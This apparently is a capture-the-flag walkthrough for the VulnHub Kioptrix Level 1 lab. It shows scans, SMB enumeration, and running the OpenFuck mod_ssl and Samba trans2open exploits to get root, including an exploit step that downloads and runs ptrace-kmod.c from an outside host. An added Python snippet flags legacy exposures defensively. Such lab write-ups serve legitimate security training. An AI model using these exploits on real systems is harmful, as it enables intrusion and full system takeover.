Kioptrix: Level 1 (#1) introduction and download link
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
First, use nmap, netdiscover, or arp-scan to discover hosts on the same subnet.
Any one of the three will do:
nmap -sP 192.168.112.0/24
netdiscover -r 192.168.112.0/24
arp-scan 192.168.112.0/24
The scan results are as follows:
root@hackercat:~# nmap -sP 192.168.112.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 03:51 EST
Nmap scan report for 192.168.112.1
Host is up (0.00098s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.112.2
Host is up (0.00015s latency).
MAC Address: 00:50:56:F7:2E:D5 (VMware)
Nmap scan report for 192.168.112.252
Host is up (0.00063s latency).
MAC Address: 00:0C:29:E1:8C:82 (VMware)
Nmap scan report for 192.168.112.254
Host is up (0.00033s latency).
MAC Address: 00:50:56:E0:3D:E8 (VMware)
Nmap scan report for 192.168.112.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.01 seconds
Currently scanning: Finished! | Screen View: Unique Hosts
14 Captured ARP Req/Rep packets, from 4 hosts. Total size: 840
____________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
---------------------------------------------------
192.168.112.1 00:50:56:c0:00:08 11 660 VMware, Inc.
192.168.112.2 00:50:56:f7:2e:d5 1 60 VMware, Inc.
192.168.112.252 00:0c:29:e1:8c:82 1 60 VMware, Inc.
192.168.112.254 00:50:56:e0:3d:e8 1 60 VMware, Inc.
root@hackercat:~# arp-scan 192.168.112.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:87:73:e8, IPv4: 192.168.112.128
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.112.2 00:50:56:f7:2e:d5 VMware, Inc.
192.168.112.1 00:50:56:c0:00:08 VMware, Inc.
192.168.112.252 00:0c:29:e1:8c:82 VMware, Inc.
192.168.112.254 00:50:56:e0:3d:e8 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.478 seconds (103.31 hosts/sec). 4 responded
So we know the target IP is 192.168.112.252.
Next we need to run a port scan.
The port scan results are as follows.
We find:
22 ssh
80 http
139 samba
443 https
111, 1024 rpc
The default scripts also return NetBIOS information,
which may be worth following up.
root@hackercat:~/vulnhub/kioptrix-level-1# cat 192.168.112.252_allPortTCP.txt
# Nmap 7.80 scan initiated Sun Feb 2 03:55:02 2020 as: nmap -v -sV -Pn -sC -p- -oN 192.168.112.252_allPortTCP.txt 192.168.112.252
Nmap scan report for 192.168.112.252
Host is up (0.0041s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-02-02T09:58:05+00:00; +1h01m48s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:E1:8C:82 (VMware)
Host script results:
|_clock-skew: 1h01m47s
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KIOPTRIX<00> Flags: <unique><active>
| KIOPTRIX<03> Flags: <unique><active>
| KIOPTRIX<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MYGROUP<00> Flags: <group><active>
| MYGROUP<1d> Flags: <unique><active>
|_ MYGROUP<1e> Flags: <group><active>
|_smb2-time: Protocol negotiation failed (SMB2)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 2 03:57:17 2020 -- 1 IP address (1 host up) scanned in 134.75 seconds
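As an added defender-side example (not part of the original writeup), this Python snippet groups each open port in nmap normal output with the NSE script lines under it and flags the legacy exposures the scan above revealed: SSHv1, SSLv2 with an export cipher, the TRACE method, and the Apache 1.3 / OpenSSL 0.9.6 versions. The sample text is a constructed excerpt of the scan output shown on this page; the rule names are my own.

```python
import re

# Constructed excerpt of the nmap -sV -sC output shown in this writeup (not the full file).
SAMPLE_NMAP = """\
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2:
| SSLv2 supported
| SSL2_RC4_128_EXPORT40_WITH_MD5
"""

# Matches the service line of an open port, e.g. "443/tcp open ssl/https Apache/1.3.20 ..."
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

# Each rule is (finding name, regex run over the port's service line plus its NSE script lines).
RULES = [
    ("sshv1-enabled", re.compile(r"Server supports SSHv1")),
    ("sslv2-enabled", re.compile(r"SSLv2 supported")),
    ("http-trace-enabled", re.compile(r"Potentially risky methods:.*\bTRACE\b")),
    ("legacy-apache-1.3", re.compile(r"Apache(?: httpd)?/?\s*1\.3\.\d+")),
    ("legacy-openssl-0.9.6", re.compile(r"OpenSSL/0\.9\.6")),
    ("export-grade-cipher", re.compile(r"EXPORT40")),
]

def parse_ports(text):
    """Group each open port's service line with the '|' script lines that follow it."""
    ports, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = f"{m.group(1)}/{m.group(2)}"
            ports[current] = [line]
        elif current and line.startswith("|"):
            ports[current].append(line)
    return ports

def triage(text):
    """Return {port: [finding, ...]} for every port whose output matches at least one rule."""
    findings = {}
    for port, lines in parse_ports(text).items():
        blob = "\n".join(lines)
        hits = [name for name, rx in RULES if rx.search(blob)]
        if hits:
            findings[port] = hits
    return findings
```

Run against a full `-oN` file the same way; ports whose output matches no rule (here 139/tcp) are left out of the result so the report lists only what needs fixing.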
root@hackercat:~/vulnhub/kioptrix-level-1# cat 192.168.112.252_UDP.txt
# Nmap 7.80 scan initiated Sun Feb 2 03:56:02 2020 as: nmap -v -sU -Pn -oN 192.168.112.252_UDP.txt 192.168.112.252
Increasing send delay for 192.168.112.252 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for 192.168.112.252
Host is up (0.00087s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
111/udp open rpcbind
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
1024/udp open|filtered unknown
MAC Address: 00:0C:29:E1:8C:82 (VMware)
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sun Feb 2 04:14:08 2020 -- 1 IP address (1 host up) scanned in 1086.03 seconds
Check the web service
Port 80 (HTTP) and port 443 (HTTPS) serve the same site.
Use dirb to quickly brute-force paths:
dirb http://192.168.112.252 -o dirb_http.txt
Let's see whether there is anything interesting in NetBIOS and SMB:
nmblookup -A 192.168.112.252
nbtscan 192.168.112.252
smbmap -H 192.168.112.252
enum4linux -a 192.168.112.252
The results are as follows.
nbtscan is actually better suited to reconnaissance of a whole subnet,
e.g. nbtscan 192.168.112.0/24
It looks like some potentially useful information can be found.
We can try connecting with rpcclient.
If a login with an empty username and password were possible,
it would already have shown up in the enum4linux scan.
root@hackercat:~/vulnhub/kioptrix-level-1# nmblookup -A 192.168.112.252
Looking up status of 192.168.112.252
KIOPTRIX <00> - B <ACTIVE>
KIOPTRIX <03> - B <ACTIVE>
KIOPTRIX <20> - B <ACTIVE>
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>
MYGROUP <00> - <GROUP> B <ACTIVE>
MYGROUP <1d> - B <ACTIVE>
MYGROUP <1e> - <GROUP> B <ACTIVE>
MAC Address = 00-00-00-00-00-00
root@hackercat:~/vulnhub/kioptrix-level-1# nbtscan 192.168.112.252
Doing NBT name scan for addresses from 192.168.112.252
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.112.252 KIOPTRIX <server> KIOPTRIX 00:00:00:00:00:00
root@hackercat:~/vulnhub/kioptrix-level-1# smbmap -H 192.168.112.252
[+] Finding open SMB ports....
root@hackercat:~/vulnhub/kioptrix-level-1# enum4linux -a 192.168.112.252
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 2 04:09:03 2020
==========================
| Target Information |
==========================
Target ........... 192.168.112.252
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=======================================================
| Enumerating Workgroup/Domain on 192.168.112.252 |
=======================================================
[+] Got domain/workgroup name: MYGROUP
===============================================
| Nbtstat Information for 192.168.112.252 |
===============================================
Looking up status of 192.168.112.252
KIOPTRIX <00> - B <ACTIVE> Workstation Service
KIOPTRIX <03> - B <ACTIVE> Messenger Service
KIOPTRIX <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
MYGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
MYGROUP <1d> - B <ACTIVE> Master Browser
MYGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
========================================
| Session Check on 192.168.112.252 |
========================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
rpcclient -U "" 192.168.112.252
or
rpcclient -U="root" 192.168.112.252
Use searchsploit to look for exploits for the relevant services:
searchsploit openssh
searchsploit apache 1.3
searchsploit openssl
The Apache mod_ssl < 2.8.7 OpenSSL PoC looks the most likely to be useful.
There are two that can be used:
one is 764.c and the other is 47080.c.
I started with 764.c,
but something seemed off,
so I decided to switch to 47080.c.
Compiling hit an error.
Opening 47080.c, the comment at the top mentions
that a library needs to be installed first:
apt install libssl-dev
Then compile with the command it gives:
gcc -o OpenFuck 47080.c -lcrypto
Afterwards there is a new OpenFuck binary.
Run it to see what it prints;
nicely, it reminds you of the usage.
./OpenFuck 192.168.112.252 443 -c 45
Turns out I misread the usage XD
The usage is:
Usage: ./OpenFuck target box [port] [-c N]
target is not where the target IP goes;
target takes the entry from the supported offset list below
that matches the target's version,
and the box after it is where the IP goes.
From the earlier port scan we already know
the version is
Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
Checking it against the list, it should be... hmm, there are quite a few XD
I picked 0x5e at random first; it failed.
root@hackercat:~/vulnhub/kioptrix-level-1# ./OpenFuck 0x5f 192.168.112.252 443 -c 45
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 45 of 45
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
Good Bye!
Using grep to search, I found there are 1.3.20 entries.
root@hackercat:~/vulnhub/kioptrix-level-1# ./OpenFuck | grep 1.3.20
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x86 - SuSE Linux 7.3 (apache-1.3.20)
So that leaves just 6a and 6b.
I choose you two!
Tried 6a: failed,
but 6b succeeded!
root@hackercat:~/vulnhub/kioptrix-level-1# ./OpenFuck 0x6b 192.168.112.252 443 -c 45
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 45 of 45
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--06:09:30-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 1.87 MB/s
06:09:31 (1.87 MB/s) - `ptrace-kmod.c' saved [3921/3921]
gcc: file path prefix `/usr/bin' never used
[+] Attached to 6241
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root
This is just one way to get root.
Let's try a different method.
Again using searchsploit,
this time looking at Samba, to see whether there is a remote PoC for Linux.
Because of case sensitivity, I grep for inux and emote:
searchsploit samba | grep inux | grep emote
I decided to try
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution
Again, copy the PoC into the working directory, compile it and run it.
It turns out it also nicely explains how to use it.
root@hackercat:~/vulnhub/kioptrix-level-1# cp /usr/share/exploitdb/exploits/multiple/remote/10.c /root/vulnhub/kioptrix-level-1/
root@hackercat:~/vulnhub/kioptrix-level-1# ls
10.c 192.168.112.252_allPortTCP.txt 192.168.112.252_UDP.txt 19975.pl 47080.c 764.c dirb_http.txt OpenFuck
root@hackercat:~/vulnhub/kioptrix-level-1# gcc 10.c -o 10
root@hackercat:~/vulnhub/kioptrix-level-1# ./10
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./10 [-bBcCdfprsStv] [host]
-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step> bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay> bruteforce/scanmode delay in micro seconds (default = 100000)
-f force
-p <port> port to attack (default = 139)
-r <ret> return address
-s scan mode (random)
-S <network> scan mode
-t <type> presets (0 for a list)
-v verbose mode
A random try and it just worked XD
root@hackercat:~/vulnhub/kioptrix-level-1# ./10 -v -b 0 192.168.112.252
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
I later learned there is also a flag in here.
Use find to search for different keywords (the glob is quoted so the shell does not expand it locally):
find / -iname '*flag*' 2>&1 | grep -v "Permission denied"
Searching for flag turned up a few things that looked like it,
but they were odd after cat.
In the end I found it with the keyword root,
under the mail directory:
cat /var/spool/mail/root
From root Sat Sep 26 11:42:10 2009
Return-Path: <root@kioptix.level1>
Received: (from root@localhost)
by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O
If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...
From root Sun Feb 2 04:45:16 2020
Return-Path: <root@kioptrix.level1>
Received: (from root@localhost)
by kioptrix.level1 (8.11.6/8.11.6) id 0129jG501136
for root; Sun, 2 Feb 2020 04:45:16 -0500
Date: Sun, 2 Feb 2020 04:45:16 -0500
From: root <root@kioptrix.level1>
Message-Id: <202002020945.0129jG501136@kioptrix.level1>
To: root@kioptrix.level1
Subject: LogWatch for kioptrix.level1